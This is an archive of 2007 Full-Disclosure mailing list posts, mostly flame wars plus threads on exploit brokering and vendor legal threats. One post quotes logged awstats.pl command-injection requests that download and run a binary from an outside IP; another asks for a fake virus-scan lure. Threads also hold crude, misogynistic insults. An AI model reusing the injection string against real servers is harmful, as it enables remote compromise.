 Why do I get such nonsense said about me because I point out that Eric 
 Harrison is a script kiddie, Simon Smith is in need of a new security 
 team, and throwing 5000 As into a buffer is not hacking :(
 
 On Feb 9, 2008 10:36 AM, SilentRunner [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:
 
 Amusing isn't it that everytime someone tells reepex to shutup,
 he/she acts as if he/she has a personal or business relationship
 with them, and that somehow he/she is important to this person.
 What transparent bollocks.
 
 
 Are you referring to Simon Smith? I assume you are. It is just strange 
 that he would tell me so many times in email how inadequate and useless 
 his security team is and how he wanted me to work for them, only to then 
 make fun of me. It seems he is jealous/angry at me for not going with 
 his company.
  
 
 It's the exact tactic used on us when running into one's annoying
 hosebeast of an ex while out with the new missus, and she says but
 you told me last night you loved me, even tho you haven't seen the
 mad bitch for 2 years. reepex has done this at least 3 times in the
 last 3 months and it pretty neatly ages him/her to his/her late
 teens.
 
 
 After reading this I believe you are a classic E-Psychiatrist [1]
 
 reepex has not contributed one useful thing to full disclosure, so
 I'm more than happy to join with the increasing majority, who would
 like it if he/she STFU.
 
 
 Yes I have. Ask coderman about my amazing revelation of htaccess in the 
 url last week, while everyone was talking about 'firefox vulnerabilities'
 
 The good news is that if reepex were older and still exhibiting the
 same psycho-ex-girlfriend behaviour, it is highly unlikely that no-
 one will want to breed with it, so at least the line will stop
 there.
 
 
 Please see [1].
 
 [1] http://www.encyclopediadramatica.com/E-Psychiatrist
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread Simon Smith
You remind me of fortune. Say something else crafty? Please?

:)

reepex wrote:
 hey simon,
 
 Are you still looking to replace your security team because of their 
 inadequacies? You seemed pretty desperate for skilled workers last time 
 we talked.
 
 On Feb 8, 2008 3:28 PM, Simon Smith [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:
 
 You would know. ;]
 
 reepex wrote:
   On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED]
   mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
  
   I appreciate knowing that I can visit my friends homes and root
   their boxes while they order pizza
   wirelessly on their couch.
  
  
   So you can 'root' your friends with a public vulnerability and
 exploit
   you didn't write? Isn't this what most people would call a script
 kiddie
  
  
  
 
  
 
 
 --
 
 - simon
 
 --
 http://www.snosoft.com
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread Simon Smith
You would know. ;]

reepex wrote:
 On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:
 
 I appreciate knowing that I can visit my friends homes and root
 their boxes while they order pizza
 wirelessly on their couch.
 
 
 So you can 'root' your friends with a public vulnerability and exploit 
 you didn't write? Isn't this what most people would call a script kiddie
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Awww, reepex feels bad because he got turned down... ;]

reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)
 
 apparently they are not too satisfied with their current employees' skills
 
 On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
 
 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.
 
 reepex wrote:
  I tried responding to your mail but it seems you did not get it so
 maybe you
  will on the list
 
  yes I would LOVE to your join your crew - could you please email
 me your
  silc server and bbs board details?
 
  On Dec 3, 2007 8:00 AM, Gobbles is back 
 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
  wrote:
 
  Would you wish to join our crew ?
 
 
 
 
 
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Your kewl

dripping wrote:
 porn stars, people who love to drip semen all over women's faces,
 etc etc
 hopefully you catch my drip.
 LOL U C WUT I DID THAR???///
 
 any new leet TRU64 EXPLOITS COMIN OUT?
 maybe you can actually get HP to like you this time
 
 Simon Smith wrote:
 lol, what kind of self respecting person uses the name dripping?
 ;]

 dripping wrote:
 What kind of self-respecting, ubar serious firm, group, or..well,
 anything, for that matter,
 uses blogspot.com for their utterly useless information.
 ty bai

 ;)

 Simon Smith wrote:
 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)

 apparently they are not too satisfied with their current employees' skills

 On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
  I tried responding to your mail but it seems you did not get it so
 maybe you
  will on the list
 
  yes I would LOVE to your join your crew - could you please email
 me your
  silc server and bbs board details?
 
  On Dec 3, 2007 8:00 AM, Gobbles is back 
 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
  wrote:
 
  Would you wish to join our crew ?
 
 
 
 
 
 
 
 

 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Forward what ever you want, just make sure to edit it first so that you
don't look like a liar ;)

dripping wrote:
 I like how he still hasn't responded.
 
 reepex wrote:
 im going to wait for simon to respond ;P

 he is really good at making himself look like an idiot

 On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote:

 not that i care if this is on/off the list,
 do it * 9000.

 reepex wrote:
 turned down? should i forward the list the emails were you and that
 random
 from netragard were begging me to work for you?

 On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote:

 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)

 apparently they are not too satisfied with their current employees'
 skills
 On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
  I tried responding to your mail but it seems you did not get it
 so
 maybe you
  will on the list
 
  yes I would LOVE to your join your crew - could you please email
 me your
  silc server and bbs board details?
 
  On Dec 3, 2007 8:00 AM, Gobbles is back 
 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
  wrote:
 
  Would you wish to join our crew ?
 
 
 
 
 
 

 
 
 --

 - simon

 --
 http://www.snosoft.com


 



-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
and yes.. I'll stop playing with the children now.

Simon Smith wrote:
 Forward what ever you want, just make sure to edit it first so that you
 don't look like a liar ;)
 
 dripping wrote:
 I like how he still hasn't responded.

 reepex wrote:
 im going to wait for simon to respond ;P

 he is really good at making himself look like an idiot

 On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote:

 not that i care if this is on/off the list,
 do it * 9000.

 reepex wrote:
 turned down? should i forward the list the emails were you and that
 random
 from netragard were begging me to work for you?

 On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote:

 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)

 apparently they are not too satisfied with their current employees'
 skills
 On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
  I tried responding to your mail but it seems you did not get it
 so
 maybe you
  will on the list
 
  yes I would LOVE to your join your crew - could you please email
 me your
  silc server and bbs board details?
 
  On Dec 3, 2007 8:00 AM, Gobbles is back 
 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
  wrote:
 
  Would you wish to join our crew ?
 
 
 
 
 
 

 
 
 --

 - simon

 --
 http://www.snosoft.com


 

 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Hah, ok that was funny, but I'm really going to shut up now cause this
thread is pointless. ;.

dripping wrote:
 pedophilia is pretty serious.
 
 Simon Smith wrote:
 and yes.. I'll stop playing with the children now.

 Simon Smith wrote:
 Forward what ever you want, just make sure to edit it first so that you
 don't look like a liar ;)

 dripping wrote:
 I like how he still hasn't responded.

 reepex wrote:
 im going to wait for simon to respond ;P

 he is really good at making himself look like an idiot

 On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote:

 not that i care if this is on/off the list,
 do it * 9000.

 reepex wrote:
 turned down? should i forward the list the emails were you and that
 random
 from netragard were begging me to work for you?

 On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote:

 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)

 apparently they are not too satisfied with their current employees'
 skills
 On Dec 9, 2007 12:04 AM, dripping  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
  I tried responding to your mail but it seems you did not get it
 so
 maybe you
  will on the list
 
  yes I would LOVE to your join your crew - could you please email
 me your
  silc server and bbs board details?
 
  On Dec 3, 2007 8:00 AM, Gobbles is back 
 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
  wrote:
 
  Would you wish to join our crew ?
 
 
 
 
 
 

 
 
 --

 - simon

 --
 http://www.snosoft.com


 



-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Flash that simulates virus scan

2007-12-09 Thread Simon Smith
Indeed... I've certainly helped to make a fool of me. ;]

Dude VanWinkle wrote:
 well, confusing reepex with an infosec worker is pretty bad, but we
 might let you off the hook this one time.
 
 Dont let it happen again :-)
 
 On Dec 9, 2007 3:23 PM, Simon Smith [EMAIL PROTECTED] wrote:
 looks like I responded to the wrong person... I'm a fool.

 reepex wrote:
 the first email from simon asking about where i work following a
 successful troll of some random kiddie

 On Oct 31, 2007 4:37 PM, Simon Smith [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 Reepex,
What company are you with? I'm actually interested in finding
 infosec
 companies that perform real work as opposed to doing everything
 automated. Nice to hear that you're a real tester.

With respect to your question, doesn't msf3 have some of that
 functionality already built into it? Have you already hit all their
 web-apps?

 reepex wrote:
 resulting to se in a pen test cuz you cant break any of the actual
 machines?

 lulz
 On 10/31/07, Joshua Tagnore  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
 List,

 Some time ago I remember that someone posted a PoC of a small
 site that
 had a really nice looking flash animation that performed a virus
 scan and
 after the virus scan was finished, the user was prompted for a
 Download
 virus fix? question. After that, of course, a file is sent to
 the user and
 he got infected with some malware. Right now I'm performing a
 penetration
 test, and I would like to target some of the users of the
 corporate LAN, so
 I think this approach is the best in order to penetrate to the LAN.

 I searched google but failed to find the URL, could someone
 send it to
 me ? Thanks!

 Cheers,
 --
 Joshua Tagnore

 --

 - simon

 --
 http://www.snosoft.com




-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] [SECUNIA] Vendors still use the legal weapon

2007-12-06 Thread Simon Smith
I would have thought that by this time businesses would be more savvy to
the entire vulnerability disclosure process. They don't seem to realize
that in most cases it's more damaging to try to quash research than it is
to accept it with open arms. That is after all because quashing research
is nearly synonymous with lying to customers.

This reminds me of the HP vs. SNOsoft fiasco back in 2001.


Thomas Kristensen wrote:
 In these days, one would have believed that vendors have learned the
 lesson not to threaten with legal actions to withhold and suppress
 significant information about vulnerabilities in their products.
 
 Well, nonetheless, Secunia just received a sequel of letters from
 Autonomy, likely not known to many, but it is the software company that
 supplies the Swiss Army Knife in handling and opening documents in
 well known software like IBM Lotus Notes and Symantec Mail Security.
 
 
 *First a little background information*
 
 The communication between Autonomy and their OEM customers regarding
 which versions of their KeyView software that fix given vulnerabilities
 has failed again and again. This has been a mess to sort out and Secunia
 has had to spend hours verifying what e.g. was fixed by IBM and what was
 fixed by Symantec - because apparently the versioning of the KeyView
 software is different whether used by Symantec, IBM, or others.
 
 We've managed to figure this out and occasionally this has caused one of
 Autonomy's OEM customers to have unpatched publicly known
 vulnerabilities in their products. All thanks to Autonomy's apparent
 inability to co-ordinate the release of new vulnerability fixes with
 their customers.
 
 Now, Autonomy has become fed up with handling all these vulnerabilities
 and believe that it is time to control what Secunia writes about.
 Autonomy wants Secunia to withhold information about the fact that
 vulnerability SA27835 in Keyview Lotus 1-2-3 File Viewer, which has been
 fixed by IBM, obviously also affects Autonomy's own versions 9.2 and
 10.3 of KeyView.
 
 According to Autonomy, publishing an advisory would be misleading and
 cause confusion because the issues already have been fixed; in fact,
 they believe that this would cause the public to believe that there are
 more issues in their product than is the case!
 
 Now that is an interesting logic.
 
 Sorry Autonomy, writing an advisory that states which vulnerabilities
 have been fixed and in which versions is in no way misleading or
 confusing - even for historical issues.
 
 What is really interesting here is the fact that the Vulnerability
 Database services offered by Autonomy's own customers IBM and Symantec
 (ISS X-Force and Securityfocus respectively) still (at the time of
 publishing) don't show information about the fact that patches are
 available for the Lotus 1-2-3 issue - while Secunia, who Autonomy
 accuses of publishing misleading information, correctly reflects the
 fact that Autonomy offers patches.
 
 However, this doesn't seem to be a concern for Autonomy or perhaps their
 legal department also treats their own customers in the same way as
 Secunia is treated?
 
 What is misleading and confusing in this whole case is the apparent lack
 of co-ordination between Autonomy and Autonomy's OEM customers, the lack
 of clear, precise public statements about vulnerabilities and security
 fixes.
 
 If Autonomy wants to avoid misleading and confusing communication,
 then Autonomy ought to start publishing bulletins such as those made by
 most other serious and established software vendors (e.g. Microsoft and
 their own customers IBM and Symantec) with clear information about the
 type of vulnerability, potential attack vectors, potential impacts,
 affected versions, and unaffected versions - it's really that simple.
 
 Naturally, Autonomy should also communicate to their own customers (IBM
 and Symantec) that patches addressing vulnerabilities are available so
 that both their products and their Vulnerability Database services are
 updated.
 
 
 *Our response to these claims and accusations*
 
 Despite Autonomy's unsubstantiated legal threats, Secunia will quite
 legally continue to do vulnerability research in Autonomy products and
 any other products of interest. Naturally, Secunia will also continue to
 publish research articles and advisories in an unbiased, balanced,
 accurate, and truthful manner as we serve one purpose only: To provide
 accurate and reliable Vulnerability Intelligence to our customers and
 the Internet in general.
 
 Secunia is in continuous, ongoing, and positive dialogues with most
 vendors including large professional organisations like Microsoft, IBM,
 Adobe, Symantec, Novell, Apple, and CA. All understand and respect the
 need for informing the public about vulnerabilities and prefer to
 co-ordinate and synchronise the publication with important Vulnerability
 Intelligence sources such as Secunia rather than battling to keep things
 secret. It is truly sad to 

[Full-disclosure] Barbut

2007-11-21 Thread Simon Smith

Anyone else seen these really 3l337 attacks?



From: 196.212.26.82

GET /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.0
Host: [removed]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close
Cache-Control: max-age=259200
Connection: keep-alive

From: 196.35.158.181

GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
Host: [ removed ]
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close
Cache-Control: max-age=259200
X-Forwarded-For: 196.212.26.82
Via: 1.0 nc5-rba (NetCache NetApp/5.5R6D17DEBUG1)


gotta love script kids...



- --

- - simon

- --
http://www.snosoft.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
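
The two requests quoted in the Barbut post above carry a shell command chain in the configdir parameter of awstats.pl, and the second arrived through a cache that names the first sender in X-Forwarded-For. The following is an added example, not part of the original thread, of flagging that pattern in captured requests and grouping hits by claimed origin; the host names, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Characters that let a parameter value break out into a shell command line.
SHELL_META = re.compile(r"[|;&`$<>\n\r]")
# Fetch-and-run vocabulary of the kind seen in the posted requests.
DROPPER_WORDS = re.compile(r"\b(?:wget|curl|chmod)\b|/tmp\b", re.I)
# A header name inside the User-Agent value: the client never ended the line.
HEADER_IN_UA = re.compile(r"\b(?:connection|host|accept|cache-control)\s*:", re.I)

# Constructed samples modelled on the post; addresses are documentation ranges.
PAYLOAD = "configdir=|echo;cd%20/tmp;wget%20192.0.2.10/sample;chmod%20755%20sample;./sample;echo|"
UA = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"
SAMPLES = [
    ("198.51.100.7", f"GET /stats/awstats.pl?{PAYLOAD} HTTP/1.0\nHost: www.example.test\n{UA}\n"),
    ("203.0.113.20", f"GET /awstats.pl?{PAYLOAD} HTTP/1.1\nHost: www.example.test\n{UA}\n"
                     "X-Forwarded-For: 198.51.100.7\nVia: 1.0 cache.example.test\n"),
    ("198.51.100.99", "GET /awstats.pl?config=www.example.test&framename=mainright HTTP/1.1\n"
                      "Host: www.example.test\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64)\n"),
]


def parse_request(raw):
    """Return (method, target, headers) from a captured request head."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, rest = lines[0].split(" ", 1)
    target, _version = rest.rsplit(" ", 1)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return method, target, headers


def query_params(target):
    """Decode query parameters, splitting on '&' only so ';' stays in the value."""
    params = []
    for pair in urlsplit(target).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote_plus(name), unquote_plus(value)))
    return params


def inspect_request(peer_ip, raw):
    """Score one request and record who it claims to come from."""
    _method, target, headers = parse_request(raw)
    reasons = []
    for name, value in query_params(target):
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacters in parameter '{name}'")
            if DROPPER_WORDS.search(value):
                reasons.append(f"fetch-and-run vocabulary in parameter '{name}'")
    if HEADER_IN_UA.search(headers.get("user-agent", "")):
        # Heuristic (assumption): treated here as a scripted-client fingerprint.
        reasons.append("header name embedded in User-Agent value")
    forwarded = [ip.strip() for ip in headers.get("x-forwarded-for", "").split(",") if ip.strip()]
    return {
        "peer": peer_ip,
        # X-Forwarded-For is client-supplied: a claim, unless the peer is a proxy you trust.
        "claimed_origin": forwarded[0] if forwarded else peer_ip,
        "via_proxy": "via" in headers,
        "path": urlsplit(target).path,
        "reasons": reasons,
    }


def group_by_origin(findings):
    """Map each claimed origin to the peers that delivered its flagged requests."""
    groups = defaultdict(list)
    for finding in findings:
        if finding["reasons"]:
            groups[finding["claimed_origin"]].append(finding["peer"])
    return dict(groups)


if __name__ == "__main__":
    results = [inspect_request(peer, raw) for peer, raw in SAMPLES]
    for result in results:
        print(result["peer"], result["path"], result["reasons"] or "clean")
    print(group_by_origin(results))
```
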


Re: [Full-disclosure] Crafted SYN Packets...

2007-11-13 Thread Simon Smith
Kelly,
SYN packets and ports do not correlate. And yes, SYN is TCP. You should
read up on TCP/IP etc so that you understand protocols before posting to
mailing lists.

Kelly Robinson wrote:
 Looking at some suspicious behaviour in our logs...
  
 If someone sends a packet with the SYN bit set to a host, typically what
 is the client's source port? Or is that crafted too?
  
 And additionally, when a client does send a packet of this type, am I
 right in assuming it's generally TCP only? Can you have a UDP SYN packet?
 I assume because it's connectionless, no???
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Simon Smith
Ah well, if a friend did that to me...

hrm... I'd probably tar and feather him near an open flame. ;]

Byron Sonne wrote:
 Paul,
 This hardly means that the hushmail crew are narqz, it just means
 that they are cooperating with the law like any legitimate business
 would. 
 
 No, it doesn't mean they're narqa, but it does mean they're spineless
 pussies that eagerly sell people out. If a friend did that to you, what
 would you think of them?
 
 Take 'em down.
 


-- 

- simon

--
http://www.snosoft.com



[Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

[ This email is in response to all of the emails that I see with people
trying to broker exploits by advertising them on full disclosure and
other public mailing lists. ]

SNOsoft has been legitimately and legally brokering exploits since early
2000, and we're still doing it very successfully. As a matter of policy
we will not ever purchase items from careless developers, and will not
sell to careless buyers or non US based buyers... With exploit brokering
comes great responsibility and liability.

People posting emails in public forums in an attempt to sell exploits is
not only careless and irresponsible, but is also a testament to that
person's immaturity and lack of experience. Do they ever stop to think
about the potential liability? What happens if they sell to a hostile
foreign party, what could happen to them, etc...?

I think that there is a legitimate market for Exploit Brokering when it
is done properly (ethically and legally). I think that in that market
the developers should adhere to strict rules and not cross certain
boundaries. I also think that the responsible and ethical developers
should be paid fair value for their time, instead of a pathetic maximum
of $5,000.00 for a high grade item. Think about it, the average QA
Engineer makes more money per bug than the higher talent security
researcher. There's something wrong with that.

The solution to that problem is not to sell exploits to just anyone in a
public forum. That introduces too much liability to the developer,
especially if the buyer is illegitimate or hostile. The solution is to
work with legitimate established businesses in a confidential and
responsible manner.

Unfortunately for those developers that are trying to sell exploits in
public forum, their chances of working with legitimate businesses are
gone. No way will any of the legitimate Exploit Brokers ever purchase an
item from an irresponsible developer. It's just a matter of time till
laws get passed and they end up getting thrown in jail for selling
weaponized exploits to the wrong people.

- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
Please forgive me... should I beg for mercy?

;]

Joey Mengele wrote:
 This is hardly on topic and you do not have any unique credentials 
 to validate your claims. Please refrain from writing off topic and 
 baseless editorials in the future or risk moderation. Thanks.
 
 J
 
 On Fri, 09 Nov 2007 15:22:01 -0500 Simon Smith [EMAIL PROTECTED] 
 wrote:
 [ This email is in response to all of the emails that I see with 
 people
 trying to broker exploits by advertising them on full disclosure 
 and
 other public mailing lists. ]

 SNOsoft has been legitimately and legally brokering exploits since 
 early
 2000, and we're still doing it very successfully. As a matter of 
 policy
 we will not ever purchase items from careless developers, and will 
 not
 sell to careless buyers or non US based buyers... With exploit 
 brokering
 comes great responsibility and liability.

 People posting emails in public forums in an attempt to sell 
 exploits is
 not only careless and irresponsible, but is also a testament to 
 that
 persons immaturity and lack of experience. Do they ever stop to 
 think
 about the potential liability? What happens if they sell to a 
 hostile
 foreign party, what could happen to them, etc...?

 I think that there is a legitimate market for Exploit Brokering 
 when it
 is done properly (ethically and legally). I think that in that 
 market
 the developers should adhere to strict rules and not cross certain
 boundaries. I also think that the responsible and ethical 
 developers
 should be paid fair value for their time, instead of a pathetic 
 maximum
 of $5,000.00 for a high grade item. Think about it, the average QA
 Engineer makes more money per bug than the higher talent security
 researcher. There's something wrong with that.

 The solution to that problem is not to sell exploits to just 
 anyone in a
 public forum. That introduces too much liability to the developer,
 especially if the buyer is illegitimate or hostile. The solution 
 is to
 work with legitimate established businesses in a confidential and
 responsible manner.

 Unfortunately for those developers that are trying to sell 
 exploits in
 public forum, their chances of working with legitimate businesses 
 are
 gone. No way will any of the legitimate Exploit Brokers ever 
 purchase an
 item from an irresponsible developer. Its just a matter of time 
 till
 laws get passed and they end up getting thrown in jail for selling
 weaponized exploits to the wrong people.

 --

 - simon

 --
 http://www.snosoft.com
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

First Answer:

Only work with partners that are well established, incorporated, and
have a legitimate use for the items that they want to purchase. Do not
work with individual buyers/people, there's too much liability and no
way to verify that they are actually US based. Make sure that every
single transaction is done under tight legally binding contract. Perform
background checks as necessary, etc.


Second Answer:

Same as the first one.

Obviously this is just a light summary of the process that we follow,
but it should give you an idea as to how we do business.



security curmudgeon wrote:
 Hi Simon,
 
 : SNOsoft has been legitimately and legally brokering exploits since early 
 : 2000, and we're still doing it very successfully. As a matter of policy 
 : we will not ever purchase items from careless developers, and will not 
 : sell to careless buyers or non US based buyers... With exploit brokering 
 : comes great responsibility and liability.
 : 
 : People posting emails in public forums in an attempt to sell exploits is 
 : not only careless and irresponsible, but is also a testament to that 
 : persons immaturity and lack of experience. Do they ever stop to think 
 : about the potential liability? What happens if they sell to a hostile 
 : foreign party, what could happen to them, etc...?
 
 Can you describe SNOsoft's process for validating buyers and assuring 
 they are US based? Is there any process to ensure that even though they 
 are US based they do not have any ill intention toward their country? 
 Just because someone has a US ID doesn't mean they were born here or not 
 working for a foreign party.
 
 jericho
 


- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

Thierry, my comments are below.

Thierry Zoller wrote:
 Dear Simon,
 
 Well if it wasn't obvious enough let me rephrase.
 
 SS What happens if they sell to a hostile
 SS foreign party, what could happen to them, etc...?
 Maybe they perceive your party as a hostile foreign party, this list is
 obviously not based in the US.
 SS What's your point?
 I think my point is very clear, those trying to find a buyer on this
 list (who you are directly speaking to in your post) are
 maybe not interested in selling to US based parties. You assume they
 are.

Right, I did make that assumption and that was purely based on my
perspective as a US based broker. There is no reason why the same kind
of business can't be done in other countries. I was thinking strictly
about my liabilities as a US based person and my restrictions only.
The US is only one country out of many.
 
 To make this even clearer :
 SSDo they ever stop to think
 SS about the potential liability? What happens if they sell to a hostile
 SSforeign party, what, what could happen to them, etc...?
 Maybe the hostile foreign party for them is the USA.

Quite possibly and I could think of many reasons why people would think
so, especially with our current president in office.

 The solution is to work with legitimate established businesses
 in a confidential and responsible manner.
 If you are responsible you surely can disclose who you are selling
 them too ? 
 SS That would be irresponsible.
 Why would disclosing who you are selling them to be irresponsible ?
 You argue that those seeking to sell over FD are careless and
 irresponsible. Now why if they sell them to you makes them less
 careless and irresponsible since they still don't know with
 whom the information will end up with.

Again from my perspective it would be irresponsible as we have
confidentiality agreements in place with partners. It might not be
irresponsible for others to disclose that information.

 
 Are you even disclosing this to the person that you
 bought them from ? When not does this make you any better than
 the others ?
 SS I have no idea what you are asking me here.
 Are you disclosing _to the person_ you bought the bugs from, to whom
 you are going to sell them ? If not I don't see the interest why they
 should choose you over others for ethical reasons.

Same answer as above.

I should apologize because the initial email sounded very arrogant. With
that said, there is still responsible brokering and irresponsible
brokering. Selling exploits to just anyone is irresponsible.





- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

No doubt...

[EMAIL PROTECTED] wrote:
 On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said:
 Thierry Zoller wrote:
 Maybe the hostile foreign party for them is the USA.
 Quite possibly and I could think of many reasons why people would think
 so, especially with our current president in office.
 
 Note that given the recent approval polls for said president, you can
 probably strike foreign from Thierry's comment and it still be correct...


- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
No worries man, I should have been more clear.

Thierry Zoller wrote:
 Dear Simon,
 
 SS Selling exploits to just anyone is irresponsible.
 Fully agree, I interpreted your initial post as being US centric and
 based on ethical judgement, hence my comments. No hard feelings =)
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Hushmail == Narqz

2007-11-08 Thread Simon Smith
Paul,
This hardly means that the hushmail crew are narqz, it just means
that they are cooperating with the law like any legitimate business
would. If you don't like that then you shouldn't use any services
offered by any legitimate business.

Good article.

Paul Melson wrote:
 http://blog.wired.com/27bstroke6/2007/11/encrypted-e-mai.html
 
 I thought it seemed a little quiet on fd today.  :-)
 
 PaulM
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] mac trojan in-the-wild

2007-11-02 Thread Simon Smith
I beg to differ, a claymore is a bit large... it would have to be
something a bit smaller, especially if it's a laptop.

reepex wrote:
 I guess you never heard of full disk encryption, finger print readers,
 or caged machines.
 
 
 On Nov 2, 2007 3:51 PM, Dude VanWinkle [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
 
 On 11/2/07, J. Oquendo [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
  Dude VanWinkle wrote:
 
   A program installed under false pretenses that will give the
   author/distributer remote access to the victim machines.
 
  Right... Guess those local are not a threat.
 
 ?? Local to the machine??
 
 all prevention methods fail if physical security is compromised.
 
 There is nothing short of hooking a claymore to the inside of your
 case that will stop someone knowledgeable who has physical access to
 your machine from doing whatever they want
 
 
 
  Vranisaprick is that you
 
 
 ?
 
 
   -JP
 
 
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Flash that simulates virus scan

2007-11-01 Thread Simon Smith
Heh... not sure what government you're referring to... btw, you going to
answer my earlier question or not?

reepex wrote:
 don't you listen to pdp ever? the government uses xss and bruteforces
 remote desktop logins
 
 http://seclists.org/fulldisclosure/2007/Oct/0417.html
 
 pdp: military grade exploits? :) dude, I am sorry man.. but you are living
 in some kind of a dream world. get real, most of the military hacks
 are as simple as bruteforcing the login prompt.. or trying something
 as simple as XSS.
 
 --
 
 pdp is an hero and a computer security expert and based on his fans
 from the list he is the greatest researcher since lcamtuf. his word =
 gold
 
 
 
 On 11/1/07, jf [EMAIL PROTECTED] wrote:
 must be on one of the .gov red teams ;]


 On Wed, 31 Oct 2007, reepex wrote:

 Date: Wed, 31 Oct 2007 16:56:20 -0500
 From: reepex [EMAIL PROTECTED]
 To: Joshua Tagnore [EMAIL PROTECTED],
 full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Flash that simulates virus scan

 resulting to se in a pen test cuz you cant break any of the actual machines?

 lulz

